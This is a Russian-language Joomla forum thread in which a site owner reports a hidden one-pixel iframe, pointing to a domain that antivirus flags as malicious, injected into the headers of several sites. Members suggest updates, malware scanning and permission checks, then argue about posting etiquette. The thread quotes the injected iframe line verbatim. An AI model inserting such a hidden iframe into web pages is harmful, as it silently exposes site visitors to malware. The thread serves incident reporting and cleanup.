Основной курс по Joomla
0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 765 Просмотров
*

Ganq

  • Осваиваюсь на форуме
  • ***
  • 44
  • 0
Всем привет решил сеня проверить свою сборку Joomla 3 у меня порядка 5 сайтов на ней. Зашел добавить счетчик и нашел вот такой код в index.php
Цитировать
<iframe src="http://googletraids.ml/46b4 " width="1" height="1" frameborder="0"></iframe>
Данный код находился в шапке сайта.
Так как я делал с 0 шаблон для сеа точно помню то что данный код я не добавлял. Шаблон собирал на примере Jblank.
Решил проверить все свои сайты и нашел там данный фрейм у всех сайтов.  Все они лежат на одном хосте. Посмотрел дату изменения файла. Все нормально изменялся мною последний раз. Зашел в стандартные шаблоны, которые были установлены опять же нашел данную строку.
Самое интересное что касперский блочит эту ссылку и говорит что там вирус.
Как решить трабл чтобы избежать последующих измений в коде со стороны?
Данные код я уже выпелил из сайтов.
На этом же хосте лежит  еще парочку сайтов на Joomla тока 2.5 но данного кода в них я не нашел
*

Ganq

  • Осваиваюсь на форуме
  • ***
  • 44
  • 0
так же проверил свои резервные копии сайта данного фрейма там тоже не обнаружил.
*

SeBun

  • Практически профи
  • *******
  • 3085
  • 187
  • @SeBun48
Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом. Так же проверить права на папки. Вот статья в помощь.
« Последнее редактирование: 07.07.2015, 15:34:46 от SeBun »
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят
*

draff

  • Практически профи
  • *******
  • 2747
  • 170
  • step by step
Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит
Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом.
*

Ganq

  • Осваиваюсь на форуме
  • ***
  • 44
  • 0
Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Ну не знаю.  Джмумла была 3.1
2.5 лежит в другой папке она никак не связана с с другими.
Обновил Joomla и модули, убрал фреймы  проверил сайт на вирусы через онлайн антивирус др веба.  Щас займусь папками и айболитом.

Кстати а айболит норм? стоит его вообще юзать или лучше плагины поставить типа админ тулса?
*

SeBun

  • Практически профи
  • *******
  • 3085
  • 187
  • @SeBun48
Кстати а айболит норм? стоит его вообще юзать или лучше плагины поставить типа админ тулса?

Посмотрите статью - сравнение сканеров.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят
*

vipiusss

  • Профи
  • ********
  • 5529
  • 318
  • Круглая ава-зло!
Движок чистый! Это у вас проблемы.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

draff

  • Практически профи
  • *******
  • 2747
  • 170
  • step by step
Ну не знаю.  Джмумла была 3.1
2.5 лежит в другой папке она никак не связана с с другими.
open_basedir прописана в конфиге для домена/папки ? Владелец разные ?
*

flyingspook

  • Moderator
  • *****
  • 3610
  • 236
Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Вроде взрослый человек, не один год друг друга знаем, если не понимаете о чем речь объясню как вы и хотели в открытую, может поймете так, не придирался ни к кому просто попросил вас, о том что надо писать информативные посты в помощь задающему вопрос, а не вставлять одни и те же бессмысленные отписки, уж лучше мимо проходите, мне все равно что вы пишете в постах но когда надо помогать не стоит писать одно и тоже вот Ваши посты только последние

а сканер айболит уже советовали применить для поиска шелла ?
Откуда Joomla скачанная? Проверьте сканером айболит файлы сайта
Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
Не понял про это действие- Сканер айболит в помощь

Joomla до .5.28 содержит уязвимость.Обновить пакетом Joomla 2.5-2.5.28
Сканер айболит в помощь
Сканер айболит в помощь. Версии Joomla до 2.5.28 содержат уязвимость безопасности, обновите Joomla и все установленные сторонние расширения
Сравнивать файлы указанные айболитом, с файлами из архива Joomla/расширений
ссылка на сайт?
сканер айболит в помощь.гугл обычно реагирует на вредоносный JavaScript
Joomla до .5.28 содержит уязвимость.Обновить пакетом Joomla 2.5-2.5.28
Сканер айболит в помощь

и прошлогодние

сканер айболит в помощь http://joomlaforum.ru/index.php/topic,195980.0.html
Есть раздел на форуме Безопасность .
Искать начни сначала с помощью сканера айболит

и поверьте мне это только малая часть ваших постов ни о чем

draff вы или помогайте развернутыми ответами или мимо проходите как многие поступают когда нету время, не набивайте себе цену не надо в топиках просто отмечаться что бы показать свою подпись, вам посоветовал вставить в подпись то что вы пишите, потому что зачем посты набивать с одним смысловым содержанием ведь можно просто отмечаться в топиках просто с подписью без ответов на вопросы.
Берите пример хотя бы с колег таких как SeBun wishlight winstrool они или отвечают развернуто или направляют в нужном направлении, или мимо проходят если время нету.
*

draff

  • Практически профи
  • *******
  • 2747
  • 170
  • step by step
Берите пример хотя бы с колег таких как SeBun wishlight winstrool они или отвечают развернуто или направляют в нужном направлении, или мимо проходят если время нету.
Офигеть.Вот и проверил.Значит SeBun можно свободно писать про айболит, см. пост выше моего, а я набиваю себе цену и т.д. А то что в личке мне написано
приветствую
вы в подпись вставьте айболита себе, а то сколько тем по существу ни чего а "сканер айболит в помощь" только у вас и wishlight
И что можно еще посоветовать человеку, который задает вопрос, из которого видно, что он не хочет перечитывать всю информацию в разделе Безопасность.
« Последнее редактирование: 08.07.2015, 12:45:48 от draff »
*

flyingspook

  • Moderator
  • *****
  • 3610
  • 236
И что можно еще посоветовать человеку, который задает вопрос, из которого видно, что он не хочет перечитывать всю информацию в разделе Безопасность.
мимо пройти чем просто отметиться
Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом. Так же проверить права на папки. Вот статья в помощь.
читаем пост внимательно, там не просто отметка, и после этого поста человек еще пишет

холиварить не будем, моя просьба остается просьбой, а ваше право выбора что писать